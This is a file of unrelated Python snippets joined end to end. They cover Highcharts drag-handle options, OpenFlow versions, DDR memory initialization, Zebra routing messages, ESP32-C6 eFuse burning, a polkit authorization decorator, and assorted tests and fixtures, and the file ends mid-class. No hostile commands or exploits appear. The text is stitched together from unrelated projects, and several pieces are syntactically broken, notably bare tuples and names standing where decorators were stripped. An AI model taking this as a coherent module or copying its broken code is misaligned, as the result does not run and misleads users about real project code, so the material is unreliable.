class OptionPlotoptionsColumnDragdropDraghandle(Options):
    """Accessors for ``plotOptions.column.dragDrop.dragHandle``.

    NOTE(review): setters shadowed identically-named getters in the source
    dump (stripped ``@property`` / ``.setter`` decorators); restored as
    property pairs with the original bodies — confirm against the code
    generator.
    """

    @property
    def className(self):
        """CSS class of the handle; defaults to 'highcharts-drag-handle'."""
        return self._config_get('highcharts-drag-handle')

    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)

    @property
    def color(self):
        """Fill color of the handle; defaults to '#fff'."""
        return self._config_get('#fff')

    @color.setter
    def color(self, text: str):
        self._config(text, js_type=False)

    @property
    def cursor(self):
        """Mouse cursor over the handle; defaults to None (unset)."""
        return self._config_get(None)

    @cursor.setter
    def cursor(self, text: str):
        self._config(text, js_type=False)

    @property
    def lineColor(self):
        """Stroke color of the handle; defaults to 'rgba(0, 0, 0, 0.6)'."""
        return self._config_get('rgba(0, 0, 0, 0.6)')

    @lineColor.setter
    def lineColor(self, text: str):
        self._config(text, js_type=False)

    @property
    def lineWidth(self):
        """Stroke width of the handle; defaults to 1."""
        return self._config_get(1)

    @lineWidth.setter
    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    @property
    def pathFormatter(self):
        """SVG path formatter callback; defaults to None (unset)."""
        return self._config_get(None)

    @pathFormatter.setter
    def pathFormatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def zIndex(self):
        """Z index of the handle; defaults to 901."""
        return self._config_get(901)

    @zIndex.setter
    def zIndex(self, num: float):
        self._config(num, js_type=False)
class OFVersions():
    """Registry of the supported OpenFlow protocol versions, with lookup
    helpers keyed by wire version and by version string.

    NOTE(review): the from_* helpers take no ``self``/``cls`` — evidently
    stripped ``@staticmethod`` decorators in the source dump; restored here.
    """

    VERSION_1_0 = OFVersion('1.0', 1)
    VERSION_1_1 = OFVersion('1.1', 2)
    VERSION_1_2 = OFVersion('1.2', 3)
    VERSION_1_3 = OFVersion('1.3', 4)
    VERSION_1_4 = OFVersion('1.4', 5)
    VERSION_1_5 = OFVersion('1.5', 6)
    all_supported = (VERSION_1_0, VERSION_1_1, VERSION_1_2, VERSION_1_3, VERSION_1_4, VERSION_1_5)
    # Lookup tables derived once at class-creation time.
    wire_version_map = {v.wire_version: v for v in all_supported}
    version_string_map = {v.version: v for v in all_supported}
    # Mutable class-level list; presumably populated elsewhere at runtime.
    target_versions = []

    @staticmethod
    def from_wire(w):
        """Resolve an OFVersion from its wire version number (KeyError if unknown)."""
        return OFVersions.wire_version_map[w]

    @staticmethod
    def from_string(s):
        """Resolve an OFVersion from its version string, e.g. '1.3'."""
        return OFVersions.version_string_map[s]

    @staticmethod
    def from_strings(*strings):
        """Resolve several version strings at once, returned as a tuple."""
        return tuple((OFVersions.version_string_map[s] for s in strings))
def get_ddr_phy_init_sequence(phy_settings, timing_settings):
    """Build the DDR initialization command sequence.

    Each entry is (comment, address, bank, command, delay). Returns
    (init_sequence, None); the second element is unused for this PHY type.
    """
    cl = phy_settings.cl
    bl = 4
    # Mode register: burst length in the low bits, CAS latency shifted up.
    mr = log2_int(bl) + (cl << 4)
    emr = 0
    reset_dll = 1 << 8  # DLL-reset bit of the mode register
    precharge_all = ('Precharge All', 1024, 0, cmds['PRECHARGE_ALL'], 0)
    init_sequence = [
        ('Bring CKE high', 0, 0, cmds['CKE'], 20000),
        precharge_all,
        ('Load Extended Mode Register', emr, 1, cmds['MODE_REGISTER'], 0),
        ('Load Mode Register / Reset DLL, CL={0:d}, BL={1:d}'.format(cl, bl), mr + reset_dll, 0, cmds['MODE_REGISTER'], 200),
        precharge_all,
        ('Auto Refresh', 0, 0, cmds['AUTO_REFRESH'], 4),
        ('Auto Refresh', 0, 0, cmds['AUTO_REFRESH'], 4),
        ('Load Mode Register / CL={0:d}, BL={1:d}'.format(cl, bl), mr, 0, cmds['MODE_REGISTER'], 200),
    ]
    return (init_sequence, None)
def get_observation_template_details(observation_template):
    """Split an Observation Template's component observations by whether they
    require sample collection.

    Returns (sample_reqd_component_obs, non_sample_reqd_component_obs) —
    two lists of Observation Template names.
    """
    obs_comp = frappe.qb.DocType('Observation Component')
    obs_temp = frappe.qb.DocType('Observation Template')
    from pypika import Case
    # One row per component; CASE projects the template name into exactly one
    # of the two columns depending on sample_collection_required (0/1).
    data = frappe.qb.from_(obs_comp).left_join(obs_temp).on((obs_comp.observation_template == obs_temp.name)).select(Case().when((obs_temp.sample_collection_required == 0), obs_temp.name).else_(None).as_('no_sample_reqd'), Case().when((obs_temp.sample_collection_required == 1), obs_temp.name).else_(None).as_('sample_reqd')).where((obs_comp.parent == observation_template)).run(as_dict=True)
    sample_reqd_component_obs = []
    non_sample_reqd_component_obs = []
    for d in data:
        # Exactly one of the two CASE columns is non-null per row.
        if d.get('no_sample_reqd'):
            non_sample_reqd_component_obs.append(d.get('no_sample_reqd'))
        elif d.get('sample_reqd'):
            sample_reqd_component_obs.append(d.get('sample_reqd'))
    return (sample_reqd_component_obs, non_sample_reqd_component_obs)
# NOTE(review): the source dump had a bare `_metaclass(abc.ABCMeta)` line
# here — evidently a stripped metaclass decorator (e.g.
# `@six.add_metaclass(abc.ABCMeta)`); expressed below with the Python 3
# `metaclass=` keyword instead. `parse` takes `cls` and was missing its
# @classmethod decorator; restored.
class _ZebraRedistribute(_ZebraMessageBody, metaclass=abc.ABCMeta):
    """Base class for ZEBRA_REDISTRIBUTE_* message bodies.

    Wire formats:
      - protocol version <= 3:  !B    (route_type)
      - protocol version == 4:  !BBH  (afi, route_type, instance)
    """

    _HEADER_FMT = '!B'
    HEADER_SIZE = struct.calcsize(_HEADER_FMT)
    _V4_HEADER_FMT = '!BBH'
    V4_HEADER_SIZE = struct.calcsize(_V4_HEADER_FMT)

    def __init__(self, route_type, afi=None, instance=None):
        super(_ZebraRedistribute, self).__init__()
        self.afi = afi            # address family (v4 header only)
        self.route_type = route_type
        self.instance = instance  # routing instance (v4 header only)

    @classmethod
    def parse(cls, buf, version=_DEFAULT_VERSION):
        """Decode a redistribute body from ``buf`` for the given protocol version."""
        afi = None
        instance = None
        if version <= 3:
            (route_type,) = struct.unpack_from(cls._HEADER_FMT, buf)
        elif version == 4:
            (afi, route_type, instance) = struct.unpack_from(cls._V4_HEADER_FMT, buf)
        else:
            raise struct.error('Unsupported Zebra protocol version: %d' % version)
        return cls(route_type, afi, instance)

    def serialize(self, version=_DEFAULT_VERSION):
        """Encode this body for the given protocol version."""
        if version <= 3:
            return struct.pack(self._HEADER_FMT, self.route_type)
        elif version == 4:
            return struct.pack(self._V4_HEADER_FMT, self.afi, self.route_type, self.instance)
        else:
            raise ValueError('Unsupported Zebra protocol version: %d' % version)
# NOTE(review): the two lines below are remnants of stripped CLI decorators
# (the leading `@` and attribute path were lost in extraction — presumably
# `@click.command()` / `@click.option('--chroot', ...)` or the project's
# equivalent). Restore them from the original project before using this as
# a command; as written the second line is not valid Python.
()
('--chroot', '-r', 'chroot_names', help='Chroot name, e.g. fedora-18-x86_64.', multiple=True)
def drop_chroot(chroot_names):
    """Delete each named mock chroot, committing after every successful delete.

    Malformed names and unknown chroots are reported per name and do not
    abort processing of the remaining names.
    """
    for chroot_name in chroot_names:
        try:
            coprs_logic.MockChrootsLogic.delete_by_name(chroot_name)
            db.session.commit()
        except exceptions.MalformedArgumentException:
            print_invalid_format(chroot_name)
        except exceptions.NotFoundException:
            print_doesnt_exist(chroot_name)
def log_fortianalyzer_override_filter(data, fos):
    """Push the log.fortianalyzer override-filter config to the device.

    Converts the module's underscore keys to the API's hyphenated form and
    issues the set() against the given vdom; returns the API response.
    """
    vdom = data['vdom']
    raw_settings = data['log_fortianalyzer_override_filter']
    payload = underscore_to_hyphen(filter_log_fortianalyzer_override_filter_data(raw_settings))
    return fos.set('log.fortianalyzer', 'override-filter', data=payload, vdom=vdom)
class TestLegalSearch(unittest.TestCase):
    """API tests for /v1/legal/search/ against a stubbed Elasticsearch client.

    NOTE(review): the bare tuples before each test method are remnants of
    stripped mock decorators — presumably
    `@mock.patch('webservices.rest.legal.es_client.search', ...)` with the
    `@` and attribute path lost in extraction. Restore them from the
    original project; without them the stub is never installed.
    """

    def setUp(self):
        self.app = rest.app.test_client()

    ('webservices.rest.legal.es_client.search', legal_search_data)
    def test_default_search(self):
        """Default search returns every document type plus per-type totals."""
        response = self.app.get('/v1/legal/search/?&api_key=1234')
        assert (response.status_code == 200)
        result = json.loads(codecs.decode(response.data))
        # Build the expected payload type-by-type from the stub's fixed docs.
        result_data = {}
        for one_doc_type in ALL_DOCUMENT_TYPES:
            type_ = result[one_doc_type][0]['type']
            if (type_ == one_doc_type):
                one_type_data = {one_doc_type: [{'type': one_doc_type, 'no': '1111', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 100, 'text': 'aaa bbb'}]}, {'type': one_doc_type, 'no': '2222', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 200, 'text': 'ccc ddd'}]}], ('total_' + one_doc_type): 2}
                result_data.update(one_type_data)
        result_data.update({'total_all': 12})
        assert (result == result_data)

    ('webservices.rest.legal.es_client.search', legal_search_data)
    def test_search_by_type(self):
        """Filtering by ?type= returns only that type, with total_all == 2."""
        for one_doc_type in ALL_DOCUMENT_TYPES:
            response = self.app.get((('/v1/legal/search/?type=' + one_doc_type) + '&api_key=1234'))
            assert (response.status_code == 200)
            result = json.loads(codecs.decode(response.data))
            type_ = result[one_doc_type][0]['type']
            if (type_ == one_doc_type):
                assert (result == {one_doc_type: [{'type': one_doc_type, 'no': '1111', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 100, 'text': 'aaa bbb'}]}, {'type': one_doc_type, 'no': '2222', 'highlights': [], 'document_highlights': {}, 'documents': [{'document_id': 200, 'text': 'ccc ddd'}]}], ('total_' + one_doc_type): 2, 'total_all': 2})

    ('webservices.rest.legal.es_client.search', legal_invalid_search)
    def test_invalid_search(self):
        """A malformed query string yields HTTP 400."""
        response = self.app.get('/v1/legal/search/?%20AND%20OR&type=advisory_opinions')
        assert (response.status_code == 400)
def download_test_data():
    """Seed the test database with job statuses, agencies, awards and
    transactions for the download-API tests, then refresh award rollups.

    BUGFIX: the three ToptierAgency lines were syntactically invalid in the
    source dump (`website=' mission='test'` — the URL literal was mangled in
    extraction). Restored with a placeholder test URL; confirm the original
    value against upstream.
    """
    for js in JOB_STATUS:
        baker.make('download.JobStatus', job_status_id=js.id, name=js.name, description=js.desc)
    ata1 = baker.make('references.ToptierAgency', name='Bureau of Things', toptier_code='100', website='http://test.com', mission='test', icon_filename='test')
    ata2 = baker.make('references.ToptierAgency', name='Bureau of Stuff', toptier_code='101', website='http://test.com', mission='test', icon_filename='test')
    baker.make('references.SubtierAgency', name='Bureau of Things', _fill_optional=True)
    aa1 = baker.make('references.Agency', id=1, toptier_agency=ata1, toptier_flag=False, _fill_optional=True)
    aa2 = baker.make('references.Agency', id=2, toptier_agency=ata2, toptier_flag=False, _fill_optional=True)
    ata3 = baker.make('references.ToptierAgency', name='Bureau of Money', toptier_code='102', website='http://test.com', mission='test', icon_filename='test')
    baker.make('references.SubtierAgency', name='Bureau of Things', _fill_optional=True)
    baker.make('references.Agency', id=3, toptier_agency=ata3, toptier_flag=False, _fill_optional=True)
    # One award per category, each with a single transaction.
    award1 = baker.make('search.AwardSearch', award_id=123, category='idv')
    award2 = baker.make('search.AwardSearch', award_id=456, category='contracts')
    award3 = baker.make('search.AwardSearch', award_id=789, category='assistance')
    baker.make(TransactionSearch, transaction_id=1, award=award1, action_date='2018-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa1.id, is_fpds=True, piid='tc1piid', awarding_toptier_agency_name='Bureau of Things', awarding_subtier_agency_name='Bureau of Things')
    baker.make(TransactionSearch, transaction_id=2, award=award2, action_date='2018-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa2.id, is_fpds=True, piid='tc2piid', awarding_toptier_agency_name='Bureau of Stuff', awarding_subtier_agency_name='Bureau of Things')
    baker.make(TransactionSearch, transaction_id=3, award=award3, action_date='2018-01-02', award_date_signed='2020-01-02', type=random.choice(list(award_type_mapping)), modification_number=1, awarding_agency_id=aa2.id, is_fpds=False, fain='ta1fain', awarding_toptier_agency_name='Bureau of Stuff', awarding_subtier_agency_name='Bureau of Things')
    update_awards()
class CSVSourceFactory(HasTraits):
    """Callable factory: load a CSV file via an interactive CSVLoader dialog,
    then hand the parsed data to a DataSourceWizardView.
    """

    def csv_loaded_callback(self, object):
        # Fired by CallbackCSVLoader once the CSV is parsed; opens the
        # data-source wizard on the loaded data dict.
        self.data_source_wizard = DataSourceWizardView(data_sources=self.csv_loader.data_dict)
        self.data_source_wizard.edit_traits()

    def __call__(self, fname):
        """Start the load flow for `fname` (non-blocking Traits dialogs)."""
        self.csv_loader = CSVLoader(filename=fname)
        self.csv_loader.guess_defaults()
        controller = CallbackCSVLoader(model=self.csv_loader, callback=self.csv_loaded_callback)
        controller.edit_traits()
def ExtractValue(message):
    """Unwrap a oneof-style value message into the native Python value.

    Scalars come back as-is; list_value/tuple_value recurse into their
    elements. Returns None if no known field is set.
    """
    # Scalar fields map straight through, checked in the original order.
    for field_name in ('string_value', 'long_value', 'bool_value', 'double_value'):
        if message.HasField(field_name):
            return getattr(message, field_name)
    if message.HasField('list_value'):
        return [ExtractValue(value) for value in message.list_value.values]
    if message.HasField('tuple_value'):
        return tuple(ExtractValue(value) for value in message.tuple_value.values)
def test_snapshot_merge(snapshot: Snapshot):
    """Merging a PartialSnapshot updates the targeted forward models only.

    Builds a partial update touching real 1 (jobs 0 and 1) and real 9
    (job 0), merges it, and checks the resulting per-job state while the
    ensemble status stays UNKNOWN.
    """
    update_event = PartialSnapshot(snapshot)
    update_event.update_forward_model(real_id='1', forward_model_id='0', forward_model=ForwardModel(status='Finished', index='0', start_time=datetime(year=2020, month=10, day=27), end_time=datetime(year=2020, month=10, day=28)))
    update_event.update_forward_model(real_id='1', forward_model_id='1', forward_model=ForwardModel(status='Running', index='1', start_time=datetime(year=2020, month=10, day=27)))
    update_event.update_forward_model(real_id='9', forward_model_id='0', forward_model=ForwardModel(status='Running', index='0', start_time=datetime(year=2020, month=10, day=27)))
    snapshot.merge_event(update_event)
    # Merging job-level updates must not change the ensemble-level status.
    assert (snapshot.status == state.ENSEMBLE_STATE_UNKNOWN)
    # The merged jobs keep their pre-existing names from the base snapshot.
    assert (snapshot.get_job(real_id='1', forward_model_id='0') == ForwardModel(status='Finished', index='0', start_time=datetime(year=2020, month=10, day=27), end_time=datetime(year=2020, month=10, day=28), name='forward_model0'))
    assert (snapshot.get_job(real_id='1', forward_model_id='1') == ForwardModel(status='Running', index='1', start_time=datetime(year=2020, month=10, day=27), name='forward_model1'))
    assert (snapshot.get_job(real_id='9', forward_model_id='0').status == 'Running')
    assert (snapshot.get_job(real_id='9', forward_model_id='0') == ForwardModel(status='Running', index='0', start_time=datetime(year=2020, month=10, day=27), name='forward_model0'))
class ScheduleBFactory(BaseFactory):
    """factory_boy factory for models.ScheduleB test rows (2016 period)."""

    class Meta():
        model = models.ScheduleB

    sub_id = factory.Sequence((lambda n: n))
    report_year = 2016
    two_year_transaction_period = 2016

    # NOTE(review): the bare `_generation` below is a stripped decorator —
    # presumably `@post_generation` (factory_boy), with the `@` and prefix
    # lost in extraction. Restore it so update_fulltext runs as a
    # post-generation hook.
    _generation
    def update_fulltext(obj, create, extracted, **kwargs):
        # Keep the tsvector search column in sync with the description.
        obj.disbursement_description_text = sa.func.to_tsvector(obj.disbursement_description)
class InstantiateGvarTest(object):
    """Tests for instancer.instantiateGvar: pinning/dropping axes and full instancing."""

    # Restored mangled `@pytest.mark.parametrize` decorators (lines began with
    # a bare `.parametrize(...)`, which is a syntax error).
    @pytest.mark.parametrize('glyph_name', ['hyphen'])
    @pytest.mark.parametrize('location, expected', [pytest.param({'wdth': (- 1.0)}, {'hyphen': [(27, 229), (27, 310), (247, 310), (247, 229), (0, 0), (274, 0), (0, 536), (0, 0)]}, id='wdth=-1.0'), pytest.param({'wdth': (- 0.5)}, {'hyphen': [(33.5, 229), (33.5, 308.5), (264.5, 308.5), (264.5, 229), (0, 0), (298, 0), (0, 536), (0, 0)]}, id='wdth=-0.5'), pytest.param({'wdth': 0.0}, {'hyphen': [(40, 229), (40, 307), (282, 307), (282, 229), (0, 0), (322, 0), (0, 536), (0, 0)]}, id='wdth=0.0')])
    def test_pin_and_drop_axis(self, varfont, glyph_name, location, expected, optimize):
        """Pinning an axis applies its deltas and removes it from all gvar tuples."""
        location = instancer.NormalizedAxisLimits(location)
        instancer.instantiateGvar(varfont, location, optimize=optimize)
        assert (_get_coordinates(varfont, glyph_name) == expected[glyph_name])
        # No remaining variation tuple may reference the pinned axis.
        assert (not any((('wdth' in t.axes) for tuples in varfont['gvar'].variations.values() for t in tuples)))

    def test_full_instance(self, varfont, optimize):
        """Pinning every axis drops the gvar table entirely."""
        location = instancer.NormalizedAxisLimits(wght=0.0, wdth=(- 0.5))
        instancer.instantiateGvar(varfont, location, optimize=optimize)
        assert (_get_coordinates(varfont, 'hyphen') == [(33.5, 229), (33.5, 308.5), (264.5, 308.5), (264.5, 229), (0, 0), (298, 0), (0, 536), (0, 0)])
        assert ('gvar' not in varfont)

    def test_composite_glyph_not_in_gvar(self, varfont):
        """A glyph without gvar deltas keeps its coordinates after instancing."""
        hmtx = varfont['hmtx']
        vmtx = varfont['vmtx']
        hyphenCoords = _get_coordinates(varfont, 'hyphen')
        assert (hyphenCoords == [(40, 229), (40, 307), (282, 307), (282, 229), (0, 0), (322, 0), (0, 536), (0, 0)])
        assert (hmtx['hyphen'] == (322, 40))
        assert (vmtx['hyphen'] == (536, 229))
        minusCoords = _get_coordinates(varfont, 'minus')
        assert (minusCoords == [(0, 0), (0, 0), (422, 0), (0, 536), (0, 0)])
        assert (hmtx['minus'] == (422, 40))
        assert (vmtx['minus'] == (536, 229))
        location = instancer.NormalizedAxisLimits(wght=(- 1.0), wdth=(- 1.0))
        instancer.instantiateGvar(varfont, location)
        # 'hyphen' has deltas and moves; 'minus' is not in gvar and must not.
        assert (_get_coordinates(varfont, 'hyphen') == [(26, 259), (26, 286), (237, 286), (237, 259), (0, 0), (263, 0), (0, 536), (0, 0)])
        assert (_get_coordinates(varfont, 'minus') == minusCoords)
        assert (hmtx['hyphen'] == (263, 26))
        assert (vmtx['hyphen'] == (536, 250))
        assert (hmtx['minus'] == (422, 26))
        assert (vmtx['minus'] == (536, 250))
class EspEfuses(base_fields.EspEfusesBase):
    """Holds and manages the state of the ESP32-C6 eFuses.

    Reads/burns eFuse blocks through the connected ``esp`` bootloader stub and
    exposes individual eFuse fields by name via ``__getitem__``.
    """

    # Class-level defaults; per-instance values are assigned in __init__.
    debug = False
    do_not_confirm = False

    def __init__(self, esp, skip_connect=False, debug=False, do_not_confirm=False):
        # Chip-specific eFuse layout/register definitions.
        self.Blocks = EfuseDefineBlocks()
        self.Fields = EfuseDefineFields()
        self.REGS = EfuseDefineRegisters
        self.BURN_BLOCK_DATA_NAMES = self.Blocks.get_burn_block_data_names()
        self.BLOCKS_FOR_KEYS = self.Blocks.get_blocks_for_keys()
        self._esp = esp
        self.debug = debug
        self.do_not_confirm = do_not_confirm
        # This class is ESP32-C6 specific: refuse any other chip.
        if (esp.CHIP_NAME != 'ESP32-C6'):
            raise esptool.FatalError(("Expected the 'esp' param for ESP32-C6 chip but got for '%s'." % esp.CHIP_NAME))
        if (not skip_connect):
            # Secure Download Mode prevents reading eFuses over serial.
            flags = self._esp.get_security_info()['flags']
            GET_SECURITY_INFO_FLAG_SECURE_DOWNLOAD_ENABLE = (1 << 2)
            if (flags & GET_SECURITY_INFO_FLAG_SECURE_DOWNLOAD_ENABLE):
                raise esptool.FatalError('Secure Download Mode is enabled. The tool can not read eFuses.')
        self.blocks = [EfuseBlock(self, self.Blocks.get(block), skip_read=skip_connect) for block in self.Blocks.BLOCKS]
        if (not skip_connect):
            self.get_coding_scheme_warnings()
        # Build the field list: regular efuses, key blocks, then (conditionally)
        # BLOCK2 calibration efuses and calculated fields.
        self.efuses = [EfuseField.convert(self, efuse) for efuse in self.Fields.EFUSES]
        self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.KEYBLOCKS]
        if skip_connect:
            self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
        else:
            # Calibration efuses are only valid for this block layout version.
            if (self['BLK_VERSION_MINOR'].get() == 1):
                self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
            self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.CALC]

    def __getitem__(self, efuse_name):
        """Look up an eFuse field by its name or any of its alternate names."""
        for e in self.efuses:
            if ((efuse_name == e.name) or any(((x == efuse_name) for x in e.alt_names))):
                return e
        # Not found: the name may belong to the lazily-added BLOCK2
        # calibration efuses; add them and retry once.
        new_fields = False
        for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES:
            if ((efuse.name == efuse_name) or any(((x == efuse_name) for x in efuse.alt_names))):
                self.efuses += [EfuseField.convert(self, efuse) for efuse in self.Fields.BLOCK2_CALIBRATION_EFUSES]
                new_fields = True
        if new_fields:
            for e in self.efuses:
                if ((efuse_name == e.name) or any(((x == efuse_name) for x in e.alt_names))):
                    return e
        raise KeyError

    def read_coding_scheme(self):
        # This chip always uses Reed-Solomon coding.
        self.coding_scheme = self.REGS.CODING_SCHEME_RS

    def print_status_regs(self):
        """Print the raw eFuse error/status registers (burn diagnostics)."""
        print('')
        self.blocks[0].print_block(self.blocks[0].err_bitarray, 'err__regs', debug=True)
        print('{:27} 0x{:08x}'.format('EFUSE_RD_RS_ERR0_REG', self.read_reg(self.REGS.EFUSE_RD_RS_ERR0_REG)))
        print('{:27} 0x{:08x}'.format('EFUSE_RD_RS_ERR1_REG', self.read_reg(self.REGS.EFUSE_RD_RS_ERR1_REG)))

    def efuse_controller_setup(self):
        """Prepare the eFuse controller before a burn operation."""
        self.set_efuse_timing()
        self.clear_pgm_registers()
        self.wait_efuse_idle()

    def write_efuses(self, block):
        """Burn the staged data of ``block``; return the post-burn error status."""
        self.efuse_program(block)
        return self.get_coding_scheme_warnings(silent=True)

    def clear_pgm_registers(self):
        """Zero all program-data registers (8 x 32-bit words)."""
        self.wait_efuse_idle()
        for r in range(self.REGS.EFUSE_PGM_DATA0_REG, (self.REGS.EFUSE_PGM_DATA0_REG + 32), 4):
            self.write_reg(r, 0)

    def wait_efuse_idle(self):
        """Poll until the controller has no pending read/program command, or time out."""
        deadline = (time.time() + self.REGS.EFUSE_BURN_TIMEOUT)
        while (time.time() < deadline):
            cmds = (self.REGS.EFUSE_PGM_CMD | self.REGS.EFUSE_READ_CMD)
            if ((self.read_reg(self.REGS.EFUSE_CMD_REG) & cmds) == 0):
                # Read twice to make sure the idle state is stable.
                if ((self.read_reg(self.REGS.EFUSE_CMD_REG) & cmds) == 0):
                    return
        raise esptool.FatalError('Timed out waiting for Efuse controller command to complete')

    def efuse_program(self, block):
        """Issue a program command for ``block``, then re-read the eFuse array."""
        self.wait_efuse_idle()
        self.write_reg(self.REGS.EFUSE_CONF_REG, self.REGS.EFUSE_WRITE_OP_CODE)
        self.write_reg(self.REGS.EFUSE_CMD_REG, (self.REGS.EFUSE_PGM_CMD | (block << 2)))
        self.wait_efuse_idle()
        self.clear_pgm_registers()
        self.efuse_read()

    def efuse_read(self):
        """Trigger a controller read-back of the eFuse array.

        If the chip drops the connection during the read (which happens when a
        just-burnt eFuse disables download mode), try to reconnect and decide
        whether the failure was in fact the expected outcome.
        """
        self.wait_efuse_idle()
        self.write_reg(self.REGS.EFUSE_CONF_REG, self.REGS.EFUSE_READ_OP_CODE)
        try:
            # Delay after the command: the chip may reset while applying it.
            self.write_reg(self.REGS.EFUSE_CMD_REG, self.REGS.EFUSE_READ_CMD, delay_after_us=1000)
            self.wait_efuse_idle()
        except esptool.FatalError:
            secure_download_mode_before = self._esp.secure_download_mode
            try:
                self._esp = self.reconnect_chip(self._esp)
            except esptool.FatalError:
                print('Can not re-connect to the chip')
                # Burning DIS_DOWNLOAD_MODE legitimately kills the connection.
                if ((not self['DIS_DOWNLOAD_MODE'].get()) and self['DIS_DOWNLOAD_MODE'].get(from_read=False)):
                    print('This is the correct behavior as we are actually burning DIS_DOWNLOAD_MODE which disables the connection to the chip')
                    print('DIS_DOWNLOAD_MODE is enabled')
                    print('Successful')
                    sys.exit(0)
                raise
            print('Established a connection with the chip')
            if (self._esp.secure_download_mode and (not secure_download_mode_before)):
                print('Secure download mode is enabled')
                # ENABLE_SECURITY_DOWNLOAD being burnt explains the mode switch.
                if ((not self['ENABLE_SECURITY_DOWNLOAD'].get()) and self['ENABLE_SECURITY_DOWNLOAD'].get(from_read=False)):
                    print('espefuse tool can not continue to work in Secure download mode')
                    print('ENABLE_SECURITY_DOWNLOAD is enabled')
                    print('Successful')
                    sys.exit(0)
            raise

    def set_efuse_timing(self):
        """Program the timing registers; values assume a 40 MHz crystal."""
        apb_freq = self.get_crystal_freq()
        if (apb_freq != 40):
            raise esptool.FatalError(('The eFuse supports only xtal=40M (xtal was %d)' % apb_freq))
        self.update_reg(self.REGS.EFUSE_DAC_CONF_REG, self.REGS.EFUSE_DAC_NUM_M, 255)
        self.update_reg(self.REGS.EFUSE_DAC_CONF_REG, self.REGS.EFUSE_DAC_CLK_DIV_M, 40)
        self.update_reg(self.REGS.EFUSE_WR_TIM_CONF1_REG, self.REGS.EFUSE_PWR_ON_NUM_M, 12288)
        self.update_reg(self.REGS.EFUSE_WR_TIM_CONF2_REG, self.REGS.EFUSE_PWR_OFF_NUM_M, 400)

    def get_coding_scheme_warnings(self, silent=False):
        """Update each block's error counters/fail flag; return True if any block failed."""
        old_addr_reg = 0
        reg_value = 0
        ret_fail = False
        for block in self.blocks:
            if (block.id == 0):
                # Block 0 errors live in dedicated repeat-error registers.
                words = [self.read_reg((self.REGS.EFUSE_RD_REPEAT_ERR0_REG + (offs * 4))) for offs in range(5)]
                block.err_bitarray.pos = 0
                for word in reversed(words):
                    block.err_bitarray.overwrite(BitArray(('uint:32=%d' % word)))
                block.num_errors = block.err_bitarray.count(True)
                block.fail = (block.num_errors != 0)
            else:
                (addr_reg, err_num_mask, err_num_offs, fail_bit) = self.REGS.BLOCK_ERRORS[block.id]
                if ((err_num_mask is None) or (err_num_offs is None) or (fail_bit is None)):
                    continue
                # Cache the register read: several blocks share one register.
                if (addr_reg != old_addr_reg):
                    old_addr_reg = addr_reg
                    reg_value = self.read_reg(addr_reg)
                block.fail = ((reg_value & (1 << fail_bit)) != 0)
                block.num_errors = ((reg_value >> err_num_offs) & err_num_mask)
            ret_fail |= block.fail
            if ((not silent) and (block.fail or block.num_errors)):
                print(('Error(s) in BLOCK%d [ERRORS:%d FAIL:%d]' % (block.id, block.num_errors, block.fail)))
        if ((self.debug or ret_fail) and (not silent)):
            self.print_status_regs()
        return ret_fail

    def summary(self):
        # No chip-specific summary notes for this target.
        return ''
class dbus_polkit_require_auth():
    """Method decorator enforcing polkit authorization on D-Bus method calls.

    A shared SystemBus connection and a proxy to the polkit authority are
    cached at class level; the proxy is invalidated when polkit's bus name
    changes owner (e.g. the service restarts).
    """

    _polkit_name = 'org.freedesktop.PolicyKit1'
    _polkit_path = '/org/freedesktop/PolicyKit1/Authority'
    _polkit_interface = 'org.freedesktop.PolicyKit1.Authority'
    _bus = None
    _bus_signal_receiver = None
    _interface_polkit = None

    def __init__(self, polkit_auth_required):
        # polkit action id that callers of the wrapped method must hold.
        self._polkit_auth_required = polkit_auth_required

    # Restored missing @classmethod: the method takes `cls` and is registered
    # as a class-level signal handler below.
    @classmethod
    def _polkit_name_owner_changed(cls, name, old_owner, new_owner):
        # Polkit restarted: drop the cached proxy so it gets re-created.
        cls._bus.remove_signal_receiver(cls._bus_signal_receiver)
        cls._bus_signal_receiver = None
        cls._interface_polkit = None

    def __call__(self, func):
        import functools

        # Restored mangled decorator (was a bare `(func)` line): preserve the
        # wrapped function's metadata.
        @functools.wraps(func)
        def _impl(*args, **kwargs):
            # Lazily create the shared bus, the NameOwnerChanged watcher and
            # the polkit authority proxy.
            if (not type(self)._bus):
                type(self)._bus = dbus.SystemBus()
            if (not type(self)._bus_signal_receiver):
                type(self)._bus_signal_receiver = type(self)._bus.add_signal_receiver(handler_function=type(self)._polkit_name_owner_changed, signal_name='NameOwnerChanged', dbus_interface='org.freedesktop.DBus', arg0=self._polkit_name)
            if (not type(self)._interface_polkit):
                try:
                    type(self)._interface_polkit = dbus.Interface(type(self)._bus.get_object(type(self)._polkit_name, type(self)._polkit_path), type(self)._polkit_interface)
                except dbus.DBusException:
                    pass
            action_id = self._polkit_auth_required
            if (not action_id):
                raise dbus.DBusException('Not Authorized: No action_id specified.')
            sender = kwargs.get('sender')
            if sender:
                if type(self)._interface_polkit:
                    # Ask polkit whether the calling bus name holds the action.
                    (result, _, _) = type(self)._interface_polkit.CheckAuthorization(('system-bus-name', {'name': sender}), action_id, {}, 1, '')
                    if (not result):
                        raise NotAuthorizedException(action_id, 'polkit')
                else:
                    # Polkit unavailable: fall back to a root-only check.
                    uid = uid_of_sender(type(self)._bus, sender)
                    if (uid != 0):
                        raise NotAuthorizedException(action_id, 'uid')
            return func(*args, **kwargs)
        _impl._polkit_auth_required = self._polkit_auth_required
        return _impl
class queue_op_failed_error_msg(error_msg):
    """OFPET_QUEUE_OP_FAILED error message (wire version 6), loxi-style codec."""

    version = 6
    type = 1
    err_type = 9

    def __init__(self, xid=None, code=None, data=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (code != None):
            self.code = code
        else:
